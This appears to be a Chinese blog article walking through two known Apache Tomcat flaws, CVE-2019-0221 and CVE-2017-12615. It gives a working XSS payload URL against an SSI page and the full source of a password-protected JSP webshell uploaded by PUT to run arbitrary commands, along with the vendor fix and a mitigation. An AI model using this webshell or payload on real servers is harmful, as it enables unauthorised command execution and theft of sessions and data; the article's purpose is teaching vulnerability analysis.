當(dāng)前位置:首頁(yè) > 公眾號(hào)精選 > 架構(gòu)師社區(qū)
[導(dǎo)讀]Tomcat是一個(gè)開(kāi)源的輕量級(jí)Web應(yīng)用服務(wù)器,在我們平常工作過(guò)程中接觸得非常多。代碼也非常經(jīng)典,很多人為了提升自己的技術(shù)也會(huì)去閱讀學(xué)習(xí)Tomcat的源碼。但正如著名詩(shī)人李白所說(shuō)的:世界上本沒(méi)有漏洞,使用的人多了,也就發(fā)現(xiàn)了漏洞。比如今年的2月份就爆出了存

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


Tomcat是一個(gè)開(kāi)源的輕量級(jí)Web應(yīng)用服務(wù)器,在我們平常工作過(guò)程中接觸得非常多。代碼也非常經(jīng)典,很多人為了提升自己的技術(shù)也會(huì)去閱讀學(xué)習(xí)Tomcat的源碼。但正如著名詩(shī)人李白所說(shuō)的:世界上本沒(méi)有漏洞,使用的人多了,也就發(fā)現(xiàn)了漏洞。比如今年的2月份就爆出了存在文件包含漏洞。今天我們選擇兩個(gè)比較直觀的Tomcat漏洞去模擬整個(gè)漏洞被攻擊的過(guò)程,以及漏洞為什么會(huì)產(chǎn)生,Tomcat大神們又是如何應(yīng)對(duì)的。

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


01


攻擊一:XSS攻擊


一、SSI技術(shù)說(shuō)明

首先演示的漏洞和Tomcat的SSI功能有關(guān),SSI是什么

SSI技術(shù),也叫作Serve Side Includes,SSI(服務(wù)器端包含)是放置在HTML頁(yè)面中的指令,并在服務(wù)頁(yè)面時(shí)在服務(wù)器上對(duì)其進(jìn)行評(píng)估。它們使您可以將動(dòng)態(tài)生成的內(nèi)容添加到現(xiàn)有的HTML頁(yè)面,而不必通過(guò)CGI程序或其他動(dòng)態(tài)技術(shù)來(lái)提供整個(gè)頁(yè)面。使用SSI技術(shù)文件默認(rèn)的后綴名為.shtml; 

舉例:我們可以將指令放置到現(xiàn)有的HTML頁(yè)面中,例如:

!--#echo var="DATE_LOCAL" -->

當(dāng)該頁(yè)面被執(zhí)行時(shí),將會(huì)顯示如下結(jié)果

Sunday, 22-March-2020 18:28:54 GMT

SSI最常見(jiàn)的用途之一:輸出CGI程序的結(jié)果,例如``命中計(jì)數(shù)器''。關(guān)于該技術(shù)更為詳細(xì)的說(shuō)明參見(jiàn):http://httpd.apache.org/docs/current/howto/ssi.html


二、為T(mén)omcat開(kāi)啟SSI

1. 準(zhǔn)備好JRE、tomcat環(huán)境,我選擇的是“apache-tomcat-9.0.10” (該漏洞受影響的版本有:Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 )

2. 修改conf/context.xml第19行,開(kāi)啟權(quán)限

<Context privileged="true">

3. 修改conf\web.xml,開(kāi)啟SSI Servlet。該段代碼默認(rèn)是被注釋掉的,我們刪除注釋即可,代碼在310-322行。

<servlet> <servlet-name>ssi</servlet-name> <servlet-class> org.apache.catalina.ssi.SSIServlet </servlet-class> <init-param> <param-name>buffered</param-name> <param-value>1</param-value> </init-param> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>expires</param-name> <param-value>666</param-value> </init-param> <init-param> <param-name>isVirtualWebappRelative</param-name> <param-value>false</param-value> </init-param> <load-on-startup>4</load-on-startup> </servlet>

去掉關(guān)于ssi配置的注釋 422-425行

 <servlet-mapping> <servlet-name>ssi</servlet-name> <url-pattern>*.shtml</url-pattern> </servlet-mapping>

4. 在根目錄下添加madashu_env.shtml(習(xí)慣性命名為printEnv.shtml)文件,位于webapps/ROOT/ssi/

<html><head><title></title><body>Echo: <!--#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>Env: <!--#printenv --></body></html>

5. 啟動(dòng)Tomcat即可


三、發(fā)起攻擊

1. 我們輸入以下url看下效果

http://localhost:8080/ssi/madashu_env.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EHello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%3C/h1%3E%3Cbr/%3E%3Cbr/%3E

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

2. XSS注入


  
http://localhost:8080/ssi/madashu_env.shtml?%3Cscript%3Ealert(%27Hello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%27)%3C/script%3E
攻擊成功,頁(yè)面展示如下。

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

通過(guò)這種方式我們使用戶加載并執(zhí)行攻擊者惡意制造的網(wǎng)頁(yè)程序,攻擊者還可能得到包括但不限于更高的權(quán)限(如執(zhí)行一些操作)、私密網(wǎng)頁(yè)內(nèi)容、會(huì)話和cookie等各種內(nèi)容。


四、源碼分析

漏洞產(chǎn)生后,Tomcat大神們迅速修復(fù)了該漏洞,我們從Github上找到當(dāng)時(shí)的代碼修復(fù)提交記錄:

https://github.com/apache/tomcat/commit/15fcd166ea2c1bb79e8541b8e1a43da9c452ceea

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


說(shuō)真的,當(dāng)時(shí)看到這段修復(fù)代碼我是驚呆了,這是什么騷操作!?。 癳ntity”又是什么鬼?。?!

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


于是接下往下翻代碼

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

這個(gè)地方將我們輸入的變量值直接輸出到了網(wǎng)頁(yè),很明顯剛剛的entity應(yīng)該是進(jìn)行了轉(zhuǎn)碼。我們找到SSIMediator.java文件,路徑org.apache.catalina.ssi. SSIMediator

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


這樣我們一下子就明白過(guò)來(lái)了,當(dāng)發(fā)現(xiàn)是“entity”編碼,會(huì)將輸入的內(nèi)容進(jìn)行Escape,從而避免了XSS。
估計(jì)大神們當(dāng)時(shí)也是緊急出了個(gè)hotfix版本,直接把參數(shù)寫(xiě)死成“entity”。還有作為Web服務(wù)器,
大神們竟然也會(huì)犯這么低級(jí)別的錯(cuò)誤,所以這也解釋了為什么不存在0Bug的系統(tǒng),哈哈!去翻看最新的SSIPrintenv.java文件,已經(jīng)把“entity”定義成常量了,這才專業(yè)嘛!

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


02


攻擊二:遠(yuǎn)程代碼執(zhí)行


接下來(lái)再簡(jiǎn)單演示下遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞為高危漏洞,即使是非默認(rèn)配置,但是一旦存在漏洞,那么攻擊者可以成功上傳 Webshell,并控制服務(wù)器。


1. 通過(guò)put方式上傳文件,請(qǐng)求進(jìn)行中時(shí)進(jìn)行攔截:


我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


2. 生成惡意文件,取名叫jiansheng.jsp

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了


<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>


3. 遠(yuǎn)程上傳成功,接下來(lái)就可以愉快地在這個(gè)不屬于我們自己的tomcat里玩耍了

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

整個(gè)代碼也是比較簡(jiǎn)單的,可以翻看JspServlet.java,這里就不做演示了。

說(shuō)明:該漏洞影響范圍非常廣,從 5.x 到 9.x 全部中槍。最好的解決方式是將 conf/web.xml 中對(duì)于 DefaultServlet 的 readonly 設(shè)置為 true。



【結(jié)語(yǔ)】興趣是最好的老師,我們通過(guò)去看大佬們掉過(guò)的坑,寫(xiě)過(guò)的代碼,站在巨人的肩膀人可以更快速地提升自己。有興趣的小伙伴可以去看看Tomcat已爆出的漏洞:

http://tomcat.apache.org/security-9.html
本次演示的兩個(gè)漏洞分別是CVE-2019-0221,CVE-2017-12615。


特別推薦一個(gè)分享架構(gòu)+算法的優(yōu)質(zhì)內(nèi)容,還沒(méi)關(guān)注的小伙伴,可以長(zhǎng)按關(guān)注一下:

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

長(zhǎng)按訂閱更多精彩▼

我成功攻擊了Tomcat服務(wù)器,大佬們的反應(yīng)亮了

如有收獲,點(diǎn)個(gè)在看,誠(chéng)摯感謝

免責(zé)聲明:本文內(nèi)容由21ic獲得授權(quán)后發(fā)布,版權(quán)歸原作者所有,本平臺(tái)僅提供信息存儲(chǔ)服務(wù)。文章僅代表作者個(gè)人觀點(diǎn),不代表本平臺(tái)立場(chǎng),如有問(wèn)題,請(qǐng)聯(lián)系我們,謝謝!

本站聲明: 本文章由作者或相關(guān)機(jī)構(gòu)授權(quán)發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點(diǎn),本站亦不保證或承諾內(nèi)容真實(shí)性等。需要轉(zhuǎn)載請(qǐng)聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權(quán)益,請(qǐng)及時(shí)聯(lián)系本站刪除。
換一批
延伸閱讀

9月2日消息,不造車的華為或?qū)⒋呱龈蟮莫?dú)角獸公司,隨著阿維塔和賽力斯的入局,華為引望愈發(fā)顯得引人矚目。

關(guān)鍵字: 阿維塔 塞力斯 華為

倫敦2024年8月29日 /美通社/ -- 英國(guó)汽車技術(shù)公司SODA.Auto推出其旗艦產(chǎn)品SODA V,這是全球首款涵蓋汽車工程師從創(chuàng)意到認(rèn)證的所有需求的工具,可用于創(chuàng)建軟件定義汽車。 SODA V工具的開(kāi)發(fā)耗時(shí)1.5...

關(guān)鍵字: 汽車 人工智能 智能驅(qū)動(dòng) BSP

北京2024年8月28日 /美通社/ -- 越來(lái)越多用戶希望企業(yè)業(yè)務(wù)能7×24不間斷運(yùn)行,同時(shí)企業(yè)卻面臨越來(lái)越多業(yè)務(wù)中斷的風(fēng)險(xiǎn),如企業(yè)系統(tǒng)復(fù)雜性的增加,頻繁的功能更新和發(fā)布等。如何確保業(yè)務(wù)連續(xù)性,提升韌性,成...

關(guān)鍵字: 亞馬遜 解密 控制平面 BSP

8月30日消息,據(jù)媒體報(bào)道,騰訊和網(wǎng)易近期正在縮減他們對(duì)日本游戲市場(chǎng)的投資。

關(guān)鍵字: 騰訊 編碼器 CPU

8月28日消息,今天上午,2024中國(guó)國(guó)際大數(shù)據(jù)產(chǎn)業(yè)博覽會(huì)開(kāi)幕式在貴陽(yáng)舉行,華為董事、質(zhì)量流程IT總裁陶景文發(fā)表了演講。

關(guān)鍵字: 華為 12nm EDA 半導(dǎo)體

8月28日消息,在2024中國(guó)國(guó)際大數(shù)據(jù)產(chǎn)業(yè)博覽會(huì)上,華為常務(wù)董事、華為云CEO張平安發(fā)表演講稱,數(shù)字世界的話語(yǔ)權(quán)最終是由生態(tài)的繁榮決定的。

關(guān)鍵字: 華為 12nm 手機(jī) 衛(wèi)星通信

要點(diǎn): 有效應(yīng)對(duì)環(huán)境變化,經(jīng)營(yíng)業(yè)績(jī)穩(wěn)中有升 落實(shí)提質(zhì)增效舉措,毛利潤(rùn)率延續(xù)升勢(shì) 戰(zhàn)略布局成效顯著,戰(zhàn)新業(yè)務(wù)引領(lǐng)增長(zhǎng) 以科技創(chuàng)新為引領(lǐng),提升企業(yè)核心競(jìng)爭(zhēng)力 堅(jiān)持高質(zhì)量發(fā)展策略,塑強(qiáng)核心競(jìng)爭(zhēng)優(yōu)勢(shì)...

關(guān)鍵字: 通信 BSP 電信運(yùn)營(yíng)商 數(shù)字經(jīng)濟(jì)

北京2024年8月27日 /美通社/ -- 8月21日,由中央廣播電視總臺(tái)與中國(guó)電影電視技術(shù)學(xué)會(huì)聯(lián)合牽頭組建的NVI技術(shù)創(chuàng)新聯(lián)盟在BIRTV2024超高清全產(chǎn)業(yè)鏈發(fā)展研討會(huì)上宣布正式成立。 活動(dòng)現(xiàn)場(chǎng) NVI技術(shù)創(chuàng)新聯(lián)...

關(guān)鍵字: VI 傳輸協(xié)議 音頻 BSP

北京2024年8月27日 /美通社/ -- 在8月23日舉辦的2024年長(zhǎng)三角生態(tài)綠色一體化發(fā)展示范區(qū)聯(lián)合招商會(huì)上,軟通動(dòng)力信息技術(shù)(集團(tuán))股份有限公司(以下簡(jiǎn)稱"軟通動(dòng)力")與長(zhǎng)三角投資(上海)有限...

關(guān)鍵字: BSP 信息技術(shù)
關(guān)閉
關(guān)閉